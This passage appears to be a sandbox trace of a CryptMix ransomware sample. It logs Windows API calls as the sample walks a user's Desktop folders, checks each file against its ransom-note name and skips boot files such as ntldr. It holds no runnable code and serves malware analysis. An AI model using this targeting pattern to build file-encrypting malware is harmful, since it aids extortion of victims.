lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.040] lstrcmpW (lpString1="jkGAH7YstwIc6lZC9j.gif", lpString2="..") returned 1 [0102.040] lstrcmpW (lpString1="jkGAH7YstwIc6lZC9j.gif", lpString2=".") returned 1 [0102.040] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.040] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="ntldr") returned 0x0 [0102.040] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="NTLDR") returned 0x0 [0102.040] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="NTDETECT.COM") returned 0x0 [0102.041] StrStrW (lpFirst="jkGAH7YstwIc6lZC9j.gif", lpSrch="ntdetect.com") returned 0x0 [0102.041] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.041] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.041] lstrcmpW (lpString1="JYsb.gif", lpString2="..") returned 1 [0102.041] lstrcmpW (lpString1="JYsb.gif", lpString2=".") returned 1 [0102.041] StrStrW (lpFirst="JYsb.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.041] StrStrW (lpFirst="JYsb.gif", lpSrch="ntldr") returned 0x0 [0102.041] StrStrW (lpFirst="JYsb.gif", lpSrch="NTLDR") returned 0x0 [0102.041] StrStrW (lpFirst="JYsb.gif", lpSrch="NTDETECT.COM") returned 0x0 [0102.041] StrStrW (lpFirst="JYsb.gif", lpSrch="ntdetect.com") returned 0x0 [0102.041] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.041] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.041] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.041] lstrcmpW (lpString1="Lj26CzXci-whK31.wav", lpString2="..") returned 1 [0102.041] lstrcmpW (lpString1="Lj26CzXci-whK31.wav", lpString2=".") returned 1 [0102.041] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.041] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="ntldr") returned 0x0 [0102.041] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="NTLDR") returned 0x0 [0102.041] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="NTDETECT.COM") returned 0x0 [0102.041] StrStrW (lpFirst="Lj26CzXci-whK31.wav", lpSrch="ntdetect.com") returned 0x0 [0102.041] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.041] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.041] lstrcmpW (lpString1="NvEcGQE86DZ.flv", lpString2="..") returned 1 [0102.041] lstrcmpW (lpString1="NvEcGQE86DZ.flv", lpString2=".") returned 1 [0102.041] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.041] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="ntldr") returned 0x0 [0102.042] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="NTLDR") returned 0x0 [0102.042] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="NTDETECT.COM") returned 0x0 [0102.042] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="ntdetect.com") returned 0x0 [0102.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.042] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.042] lstrcmpW (lpString1="oNjA8Krckm-Uh1s9B5p.mkv", lpString2="..") returned 1 [0102.042] lstrcmpW (lpString1="oNjA8Krckm-Uh1s9B5p.mkv", lpString2=".") returned 1 [0102.044] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.044] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="ntldr") returned 0x0 [0102.044] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="NTLDR") returned 0x0 [0102.044] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0102.044] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="ntdetect.com") returned 0x0 [0102.044] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.045] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.045] lstrcmpW (lpString1="oVGbbCOCJnt_S.bmp", lpString2="..") returned 1 [0102.045] lstrcmpW (lpString1="oVGbbCOCJnt_S.bmp", lpString2=".") returned 1 [0102.045] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.045] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="ntldr") returned 0x0 [0102.045] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="NTLDR") returned 0x0 [0102.045] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0102.045] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="ntdetect.com") returned 0x0 [0102.045] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.045] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.045] lstrcmpW (lpString1="P2Yd7s y0s0iE3pixbWf.mp4", lpString2="..") returned 1 [0102.045] lstrcmpW (lpString1="P2Yd7s y0s0iE3pixbWf.mp4", lpString2=".") returned 1 [0102.045] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.045] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="ntldr") returned 0x0 [0102.045] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="NTLDR") returned 0x0 [0102.045] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0102.045] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="ntdetect.com") returned 0x0 [0102.045] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.045] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.045] lstrcmpW (lpString1="qWhs9jNagvnL0I2S.avi", lpString2="..") returned 1 [0102.045] lstrcmpW (lpString1="qWhs9jNagvnL0I2S.avi", lpString2=".") returned 1 [0102.045] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.045] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="ntldr") returned 0x0 [0102.045] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="NTLDR") returned 0x0 [0102.046] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="NTDETECT.COM") returned 0x0 [0102.046] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="ntdetect.com") returned 0x0 [0102.046] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.046] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.046] lstrcmpW (lpString1="R29FEAYxqzGKfm4iuq.wav", lpString2="..") returned 1 [0102.046] lstrcmpW (lpString1="R29FEAYxqzGKfm4iuq.wav", lpString2=".") returned 1 [0102.046] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.046] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="ntldr") returned 0x0 [0102.046] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="NTLDR") returned 0x0 [0102.046] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="NTDETECT.COM") returned 0x0 [0102.046] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="ntdetect.com") returned 0x0 [0102.046] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.046] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.046] lstrcmpW (lpString1="RcaCR.avi", lpString2="..") returned 1 [0102.046] lstrcmpW (lpString1="RcaCR.avi", lpString2=".") returned 1 [0102.046] StrStrW (lpFirst="RcaCR.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.046] StrStrW (lpFirst="RcaCR.avi", lpSrch="ntldr") returned 0x0 [0102.046] StrStrW (lpFirst="RcaCR.avi", lpSrch="NTLDR") returned 0x0 [0102.046] StrStrW (lpFirst="RcaCR.avi", lpSrch="NTDETECT.COM") returned 0x0 [0102.046] StrStrW (lpFirst="RcaCR.avi", lpSrch="ntdetect.com") returned 0x0 [0102.046] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.046] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.046] lstrcmpW (lpString1="SdgI3.mp4", lpString2="..") returned 1 [0102.046] lstrcmpW (lpString1="SdgI3.mp4", lpString2=".") returned 1 [0102.046] StrStrW (lpFirst="SdgI3.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.046] StrStrW (lpFirst="SdgI3.mp4", lpSrch="ntldr") returned 0x0 [0102.046] StrStrW (lpFirst="SdgI3.mp4", lpSrch="NTLDR") returned 0x0 [0102.047] StrStrW (lpFirst="SdgI3.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0102.047] StrStrW (lpFirst="SdgI3.mp4", lpSrch="ntdetect.com") returned 0x0 [0102.047] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.047] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.047] lstrcmpW (lpString1="XaK4rq6FxAm.gif", lpString2="..") returned 1 [0102.047] lstrcmpW (lpString1="XaK4rq6FxAm.gif", lpString2=".") returned 1 [0102.047] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.047] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="ntldr") returned 0x0 [0102.047] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="NTLDR") returned 0x0 [0102.047] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="NTDETECT.COM") returned 0x0 [0102.047] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="ntdetect.com") returned 0x0 [0102.047] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.047] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.047] lstrcmpW (lpString1="xzzx_cryptMix.vir.exe", lpString2="..") returned 1 [0102.047] lstrcmpW (lpString1="xzzx_cryptMix.vir.exe", lpString2=".") returned 1 [0102.047] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.047] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="ntldr") returned 0x0 [0102.047] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="NTLDR") returned 0x0 [0102.047] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="NTDETECT.COM") returned 0x0 [0102.047] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="ntdetect.com") returned 0x0 [0102.047] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.047] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.047] lstrcmpW (lpString1="Ya6Z9poxN.swf", lpString2="..") returned 1 [0102.047] lstrcmpW (lpString1="Ya6Z9poxN.swf", lpString2=".") returned 1 [0102.047] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.047] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="ntldr") returned 0x0 [0102.048] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="NTLDR") returned 0x0 [0102.048] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="NTDETECT.COM") returned 0x0 [0102.048] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="ntdetect.com") returned 0x0 [0102.048] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.048] lstrcmpW (lpString1="ym0OWp.ods", lpString2="..") returned 1 [0102.048] lstrcmpW (lpString1="ym0OWp.ods", lpString2=".") returned 1 [0102.048] StrStrW (lpFirst="ym0OWp.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.048] StrStrW (lpFirst="ym0OWp.ods", lpSrch="ntldr") returned 0x0 [0102.048] StrStrW (lpFirst="ym0OWp.ods", lpSrch="NTLDR") returned 0x0 [0102.048] StrStrW (lpFirst="ym0OWp.ods", lpSrch="NTDETECT.COM") returned 0x0 [0102.048] StrStrW (lpFirst="ym0OWp.ods", lpSrch="ntdetect.com") returned 0x0 [0102.048] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.048] lstrcmpW (lpString1="YmOf4LXrg2cAXUtOgh.m4a", lpString2="..") returned 1 [0102.048] lstrcmpW (lpString1="YmOf4LXrg2cAXUtOgh.m4a", lpString2=".") returned 1 [0102.048] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.048] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="ntldr") returned 0x0 [0102.048] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="NTLDR") returned 0x0 [0102.048] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0102.048] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="ntdetect.com") returned 0x0 [0102.048] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.048] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.048] lstrcmpW (lpString1="zexl18m.mp3", lpString2="..") returned 1 [0102.048] lstrcmpW (lpString1="zexl18m.mp3", lpString2=".") returned 1 [0102.048] StrStrW (lpFirst="zexl18m.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.049] StrStrW (lpFirst="zexl18m.mp3", lpSrch="ntldr") returned 0x0 [0102.049] StrStrW (lpFirst="zexl18m.mp3", lpSrch="NTLDR") returned 0x0 [0102.049] StrStrW (lpFirst="zexl18m.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0102.049] StrStrW (lpFirst="zexl18m.mp3", lpSrch="ntdetect.com") returned 0x0 [0102.049] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.049] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.049] lstrcmpW (lpString1="ZZFMbf.odt", lpString2="..") returned 1 [0102.049] lstrcmpW (lpString1="ZZFMbf.odt", lpString2=".") returned 1 [0102.049] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.049] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="ntldr") returned 0x0 [0102.049] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="NTLDR") returned 0x0 [0102.051] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="NTDETECT.COM") returned 0x0 [0102.051] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="ntdetect.com") returned 0x0 [0102.051] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.051] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.051] lstrcmpW (lpString1="_av9Cb6IPXGAa5C.mp4", lpString2="..") returned 1 [0102.051] lstrcmpW (lpString1="_av9Cb6IPXGAa5C.mp4", lpString2=".") returned 1 [0102.051] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.051] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="ntldr") returned 0x0 [0102.051] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="NTLDR") returned 0x0 [0102.051] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0102.051] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="ntdetect.com") returned 0x0 [0102.051] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.051] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0102.051] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0102.052] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0102.052] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0102.052] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0102.052] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0102.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0102.052] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0102.052] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0102.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0102.052] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0102.052] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.052] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.052] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.052] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.052] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.052] lstrcmpW (lpString1="Ee7G-xHgdwJfqcsImMM", lpString2="..") returned 1 [0102.053] lstrcmpW (lpString1="Ee7G-xHgdwJfqcsImMM", lpString2=".") returned 1 [0102.053] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0102.053] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0102.053] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0102.053] SetErrorMode (uMode=0x1) returned 0x1 [0102.053] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0102.053] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.053] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.053] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0102.053] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0102.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0102.054] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0102.054] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.054] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.054] lstrcmpW (lpString1="4BTbVX2SL5PMNXlhJi.m4a", lpString2="..") returned 1 [0102.054] lstrcmpW (lpString1="4BTbVX2SL5PMNXlhJi.m4a", lpString2=".") returned 1 [0102.054] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.054] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="ntldr") returned 0x0 [0102.054] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="NTLDR") returned 0x0 [0102.054] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0102.054] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="ntdetect.com") returned 0x0 [0102.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.054] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.055] lstrcmpW (lpString1="BOrtQ-gODoJ96Mp2i.pps", lpString2="..") returned 1 [0102.055] lstrcmpW (lpString1="BOrtQ-gODoJ96Mp2i.pps", lpString2=".") returned 1 [0102.055] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.055] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="ntldr") returned 0x0 [0102.055] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="NTLDR") returned 0x0 [0102.055] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="NTDETECT.COM") returned 0x0 [0102.055] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="ntdetect.com") returned 0x0 [0102.055] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.055] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.055] lstrcmpW (lpString1="RH-9w1ekDlX.swf", lpString2="..") returned 1 [0102.055] lstrcmpW (lpString1="RH-9w1ekDlX.swf", lpString2=".") returned 1 [0102.055] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.055] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="ntldr") returned 0x0 [0102.055] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="NTLDR") returned 0x0 [0102.055] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="NTDETECT.COM") returned 0x0 [0102.055] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="ntdetect.com") returned 0x0 [0102.055] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0102.055] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0102.055] lstrcmpW (lpString1="rvzAqm2.flv", lpString2="..") returned 1 [0102.055] lstrcmpW (lpString1="rvzAqm2.flv", lpString2=".") returned 1 [0102.055] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.055] StrStrW 